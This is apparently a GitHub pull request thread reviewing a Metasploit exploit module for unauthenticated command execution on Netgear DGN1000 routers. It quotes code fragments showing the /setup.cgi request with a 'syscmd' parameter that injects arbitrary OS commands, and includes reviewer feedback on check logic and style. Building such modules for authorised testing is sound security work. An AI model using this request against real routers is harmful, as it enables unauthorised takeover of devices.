Netgear DGN1000 Unauthenticated OS Command execution #9106
Conversation
], | ||
'References' => | ||
[ | ||
['URL', 'https://www.exploit-db.com/exploits/25978/'], |
}, | ||
'Author' => [ | ||
'Mumbai <https://github.com/realoriginal>', # module | ||
'Robort Palerie' # vuln discovery |
you should include Robort's email that is in the EDB module
'method' => 'GET' | ||
}) | ||
|
||
if [200, 301, 302, 401].include?(res.code) |
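Review bot: treating a 401 as a positive hit on the last line of this hunk is at odds with the module's premise. A 401 on /setup.cgi means the page is behind HTTP authentication, which is exactly the condition an unauthenticated bug cannot be confirmed from, so either drop 401 from the list or map it to Exploit::CheckCode::Unknown rather than Detected.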
if res && ...
always remember to check for res.
}) | ||
|
||
if [200, 301, 302, 401].include?(res.code) | ||
return Exploit::CheckCode::Detected |
so if ANY site EVER has setup.cgi it's detected? Is there any unique item on the page to check for, or a disclosed version number on any unauth pages?
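The two review points above (guard against a nil response before touching res.code, and require a device-specific fingerprint instead of treating any /setup.cgi as a hit) can be written as one small decision function. This is an added illustration, not code from the PR or from the Metasploit framework: Response is a stand-in for the Rex HTTP response object, NETGEAR_MARKER is an assumed placeholder fingerprint, and the returned symbols mirror the Exploit::CheckCode names used in the thread.

```ruby
# Added illustration of the review feedback on the module's check method.
# Response stands in for the Rex::Proto::Http::Response that send_request_cgi
# returns; nil models a timeout or refused connection.
Response = Struct.new(:code, :body, :headers)

# Assumed placeholder, not taken from the PR: a string the target firmware's
# setup.cgi page is known to contain. A real module would use a marker
# verified against captured traffic (e.g. the pcap requested in this thread).
NETGEAR_MARKER = 'DGN1000'.freeze

# Maps a response to the CheckCode outcome discussed in the review:
#   :unknown  -> Exploit::CheckCode::Unknown
#   :safe     -> Exploit::CheckCode::Safe
#   :detected -> Exploit::CheckCode::Detected
def classify_check_response(res)
  # Reviewer point 1: send_request_cgi returns nil when the host does not
  # answer, so res.code would raise NoMethodError without this guard.
  return :unknown if res.nil?

  case res.code
  when 404
    # /setup.cgi is absent, so this cannot be the affected device.
    :safe
  when 200
    # Reviewer point 2: /setup.cgi existing on some arbitrary web server is
    # not evidence. Only a device-specific marker in the body is.
    res.body.to_s.include?(NETGEAR_MARKER) ? :detected : :unknown
  else
    # 301/302 carry no body to fingerprint; 401 means the page is behind
    # HTTP auth, which an unauthenticated check cannot see past.
    :unknown
  end
end
```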
def execute_command(cmd, opts) | ||
begin | ||
res = send_request_cgi({ | ||
'uri' => "/setup.cgi", |
single quotes
'method' => 'GET', | ||
'vars_get' => { | ||
'next_file' => "netgear.cfg", | ||
'todo' => "syscmd", |
single quotes
'vars_get' => { | ||
'next_file' => "netgear.cfg", | ||
'todo' => "syscmd", | ||
'cmd' => "#{cmd}", |
cmd.to_s
should work fine here instead of "#{cmd}"
'next_file' => "netgear.cfg", | ||
'todo' => "syscmd", | ||
'cmd' => "#{cmd}", | ||
'curpath' => "/", |
single quotes
'todo' => "syscmd", | ||
'cmd' => "#{cmd}", | ||
'curpath' => "/", | ||
'currentsetting.htm' => "1" |
single quotes
shit! will fix immediately. forgot to fix these ughh
return Exploit::CheckCode::Unknown | ||
end | ||
|
||
|
remove a space?
Fixed requested changes |
@h00die it's weird, I keep adding the header yet the cli keeps marking it wrong. |
The error I'm seeing is: modules/exploits/linux/http/netgear_dgn1000_setup_unauth_exec.rb - [ERROR] Exploit is missing a disclosure date |
Gotcha. Thank you! added it hopefully works |
Anyone have this router to test with? If not, @realoriginal would you be able to send a pcap of the check and exploitation (sanitized if you wish) to msfdev@metasploit.com ? |
Yes @h00die I will send a Pcap tomorrow morning, is there a format which I should submit in the email, i.e. module name and stuff? |
You can put the PR number (PR: #9106) but nothing formal is required. I'll know! |
gotcha. Was able to do it, sent it in :D |
Was able to submit a PCAP a few hours later, you may notice the localhost for both dest and source, it's due to proxy. Hopefully doesn't affect much @h00die |
], | ||
'References' => | ||
[ | ||
['EDB', '24464'], |
This doesn't look to be the same finding.
'References' => | ||
[ | ||
['EDB', '24464'], | ||
['URL', 'https://www.exploit-db.com/exploits/25978/'], |
['EDB', '25978']
just one last minor edit and it'll be ready to land! |
fixed. :D |
'References' => | ||
[ | ||
['EDB', '25978'], | ||
['URL', 'https://www.exploit-db.com/exploits/25978/'], |
don't need this line anymore
sorry, one last (bigger) thing, need some module docs on here. See https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/http/netgear_r7000_cgibin_exec.md as a close example |
No problem. will bust em out rn. |
Done @h00die |
I did a few code cleanups: 210f6f8#diff-b29c8db7b12be9e30426bf7347cbd388 in the module added the default target and payload (per what you used). Cleaned up some spacing, and the module docs. |
Thanks for submitting and all the quick turnarounds! |
Release Notes: An exploit has been added for unauth RCE to Netgear DGN1000 routers. |
thank you sir! Will make sure to have this all done for any future models so you guys have less of a headache xD. Appreciate it |
This module exploits an unauthenticated OS command execution vulnerability, similar to https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/netgear_dgn1000b_setup_exec.rb.
Verification